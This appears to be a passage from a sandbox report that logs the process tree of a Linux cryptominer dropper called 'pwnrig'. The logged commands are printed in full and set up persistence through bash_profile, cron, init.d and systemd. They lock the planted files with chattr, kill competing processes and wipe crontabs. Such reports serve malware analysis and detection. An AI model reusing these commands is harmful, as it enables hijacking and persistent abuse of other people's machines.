daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
    3⤵
    - Attempts to change immutable files
    - Writes file to tmp directory
    PID:2193
  - - /usr/bin/id
      id -u
      4⤵
      PID:2194
  - - /usr/bin/id
      id -u
      4⤵
      PID:2195
  - - /usr/bin/chattr
      chattr -i -a /bin/bprofr "~/.bash_profile"
      4⤵
      PID:2196
  - - /usr/bin/rm
      rm -rf /bin/bprofr
      4⤵
      PID:2197
  - - /usr/bin/sed
      sed -i /bprofr/d "~/.bash_profile"
      4⤵
      PID:2198
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/bprofr
      4⤵
      Writes file to system bin folder
      PID:2199
  - - /usr/bin/id
      id -u
      4⤵
      PID:2200
  - - /usr/bin/chattr
      chattr +i +a /bin/bprofr "~/.bash_profile"
      4⤵
      PID:2201
  - - /usr/bin/mkdir
      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      4⤵
      PID:2202
  - - /usr/bin/chattr
      chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
      4⤵
      PID:2203
  - - /usr/bin/rm
      rm -rf /bin/crondr
      4⤵
      PID:2204
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/crondr
      4⤵
      Writes file to system bin folder
      PID:2205
  - - /usr/bin/tee
      tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:2207
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:2208
  - - /usr/bin/chmod
      chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:2209
  - - /usr/bin/chattr
      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:2210
  - - /usr/bin/which
      which chkconfig
      4⤵
      PID:2211
  - - /usr/bin/which
      which update-rc.d
      4⤵
      PID:2212
  - - /usr/bin/chattr
      chattr -i -a /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:2213
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig disable
      4⤵
      PID:2214
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig remove
      4⤵
      PID:2215
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2216
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2216
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2216
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2216
  - - /usr/bin/rm
      rm -rf /bin/initdr
      4⤵
      PID:2251
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/initdr
      4⤵
      Writes file to system bin folder
      PID:2252
  - - /usr/bin/tee
      tee /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:2258
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:2260
  - - /usr/bin/chmod
      chmod +x /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:2261
  - - /usr/sbin/update-rc.d
      update-rc.d pwnrig defaults
      4⤵
      PID:2263
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2267
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2267
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2267
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2267
  - - /usr/sbin/update-rc.d
      update-rc.d pwnrig enable
      4⤵
      PID:2322
    - - /usr/local/sbin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:2323
    - - /usr/local/bin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:2323
    - - /usr/sbin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:2323
    - - /usr/bin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        Reads EFI boot settings
        
        PID:2323
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2324
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2324
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2324
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        
        PID:2324
  - - /usr/bin/chattr
      chattr +i +a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:2352
  - - /usr/bin/which
      which systemctl
      4⤵
      PID:2353
  - - /usr/bin/chattr
      chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      PID:2354
  - - /usr/bin/rm
      rm -rf /bin/sysdr
      4⤵
      PID:2355
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/sysdr
      4⤵
      Writes file to system bin folder
      PID:2356
  - - /usr/bin/tee
      tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Modifies systemd
      PID:2362
  - - /usr/bin/sed
      sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      PID:2363
  - - /usr/bin/chattr
      chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      PID:2375
  - - /usr/bin/systemctl
      systemctl enable pwnrige.service
      4⤵
      Reads EFI boot settings
      PID:2376
  - - /usr/bin/systemctl
      systemctl enable pwnrigl.service
      4⤵
      Reads EFI boot settings
      PID:2404
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:2443
  - - /usr/bin/systemctl
      systemctl reload-or-restart pwnrige.service
      4⤵
      Reads EFI boot settings
      Reads runtime system information
      PID:2469
- /tmp/service-agent
  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID:2526
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    PID:2550
  - - /usr/bin/whoami
      whoami
      4⤵
      PID:2561
  - - /usr/bin/hostname
      hostname
      4⤵
      PID:2562
  - - /usr/bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2563
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2579
  - - /usr/bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2581
  - - /usr/bin/ps
      ps -A "-ostat,ppid"
      4⤵
      PID:2580
  - - /usr/bin/id
      id -u
      4⤵
      PID:2583
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:2586
  - - /usr/bin/grep
      grep /etc/cron
      4⤵
      PID:2585
  - - /usr/bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2584
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2588
  - - /usr/bin/id
      id -u
      4⤵
      PID:2589
  - - /usr/bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:2594
  - - /usr/bin/grep
      grep -v /usr/sbin/httpd
      4⤵
      PID:2593
  - - /usr/bin/grep
      grep -v -- "-bash[[:space:]]*\$"
      4⤵
      PID:2592
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:2591
  - - /usr/bin/ps
      ps aux
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2590
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    3⤵
    PID:2596
  - - /usr/bin/id
      id -u
      4⤵
      PID:2597
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:2782
- /usr/bin/pkill
  pkill -f .klibsystem5
  2⤵
  PID:2783
- /usr/bin/pkill
  pkill -f .klibsystem4
  2⤵
  - Reads CPU attributes
  PID:2784
- /usr/bin/bash
  bash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"
  2⤵
  PID:2785
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2787
- /usr/bin/chattr
  chattr -ia /etc/cron.d/.lib-knlib4
  2⤵
  PID:2788
- /usr/bin/chattr
  chattr +ia /etc/cron.d/.lib-knlib4
  2⤵
  PID:2789
- /usr/bin/chattr
  chattr -ia /var/spool/cron/.lib-knlib4
  2⤵
  PID:2790
- /usr/bin/chattr
  chattr +ia /var/spool/cron/.lib-knlib4
  2⤵
  PID:2791
- /usr/bin/chattr
  chattr -ia /etc/cron.hourly/.lib-knlib4
  2⤵
  PID:2792
- /usr/bin/chattr
  chattr +ia /etc/cron.hourly/.lib-knlib4
  2⤵
  PID:2793
- /usr/bin/chattr
  chattr -ia /etc/cron.daily/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:2794
- /usr/bin/chattr
  chattr +ia /etc/cron.daily/.lib-knlib4
  2⤵
  PID:2795
- /usr/bin/chattr
  chattr -ia /etc/cron.weekly/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:2796
- /usr/bin/chattr
  chattr +ia /etc/cron.weekly/.lib-knlib4
  2⤵
  PID:2797
- /usr/bin/chattr
  chattr -ia /etc/cron.monthly/.lib-knlib4
  2⤵
  PID:2798
- /usr/bin/chattr
  chattr +ia /etc/cron.monthly/.lib-knlib4
  2⤵
  PID:2799
- /usr/bin/chattr
  chattr -ia /etc/anacrontab
  2⤵
  - Attempts to change immutable files
  PID:2800
- /usr/bin/chattr
  chattr +ia /etc/anacrontab
  2⤵
  PID:2801
- /tmp/service-agent
  /tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
  2⤵
  - Executes dropped EXE
  - Checks CPU configuration
  - Checks hardware identifiers (DMI)
  - Reads CPU attributes
  - Reads hardware information
  - Enumerates kernel/hardware configuration
  PID:2802
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    PID:2803
  - - /usr/bin/whoami
      whoami
      4⤵
      PID:2814
  - - /usr/bin/hostname
      hostname
      4⤵
      PID:2815
  - - /usr/bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2816
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2832
  - - /usr/bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2834
  - - /usr/bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads runtime system information
      PID:2833
  - - /usr/bin/id
      id -u
      4⤵
      PID:2836
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:2839
  - - /usr/bin/grep
      grep /etc/cron
      4⤵
      PID:2838
  - - /usr/bin/ps
      ps x
      4⤵
      Reads runtime system information
      PID:2837
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
    3⤵
    - Writes file to tmp directory
    PID:2841
  - - /usr/bin/id
      id -u
      4⤵
      PID:2842
  - - /usr/bin/id
      id -u
      4⤵
      PID:2843
  - - /usr/bin/chattr
      chattr -i -a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:2844
  - - /usr/bin/rm
      rm -rf /bin/bprofr
      4⤵
      PID:2845
  - - /usr/bin/sed
      sed -i /bprofr/d "~/.bash_profile"
      4⤵
      PID:2846
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/bprofr
      4⤵
      Writes file to system bin folder
      PID:2847
  - - /usr/bin/id
      id -u
      4⤵
      PID:2848
  - - /usr/bin/chattr
      chattr +i +a /bin/bprofr "~/.bash_profile"
      4⤵
      PID:2849
  - - /usr/bin/mkdir
      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      4⤵
      PID:2850
  - - /usr/bin/chattr
      chattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:2851
  - - /usr/bin/rm
      rm -rf /bin/crondr
      4⤵
      PID:2852
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/crondr
      4⤵
      Writes file to system bin folder
      PID:2853
  - - /usr/bin/tee
      tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      PID:2855
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:2856
  - - /usr/bin/chmod
      chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:2857
